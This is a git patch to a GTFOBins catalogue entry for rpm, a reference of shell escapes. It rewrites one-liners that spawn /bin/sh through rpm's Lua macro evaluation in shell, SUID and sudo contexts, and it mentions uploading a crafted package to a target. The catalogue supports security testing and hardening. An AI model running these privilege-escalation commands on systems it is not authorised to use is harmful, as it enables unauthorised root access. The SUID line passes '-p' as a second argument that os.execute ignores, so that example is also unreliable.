From 3bd955e8ccb8c2a3e9a487364811f5cfe543e789 Mon Sep 17 00:00:00 2001 From: brian <20693610+bstapes@users.noreply.github.com> Date: Thu, 14 Feb 2019 12:29:22 +0100 Subject: [PATCH] Use os.execute instead of posix.exec in rpm From rpm versions 4.9.0 and on, posix.exec() will return an error unless called from a child process created with posix.fork(). os.execute() may be used instead. This change is documented in these two resources: - http://rpm.org/user_doc/lua.html - https://rpm-packaging-guide.github.io/ Close #53. --- _gtfobins/rpm.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md index 6ef60ae..6b440d7 100644 --- a/_gtfobins/rpm.md +++ b/_gtfobins/rpm.md @@ -1,11 +1,11 @@ --- functions: shell: - - code: rpm --eval '%{lua:posix.exec("/bin/sh")}' + - code: rpm --eval '%{lua:os.execute("/bin/sh")}' suid: - - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' + - code: ./rpm --eval '%{lua:os.execute("/bin/sh", "-p")}' sudo: - - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' + - code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}' - description: | It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target. ```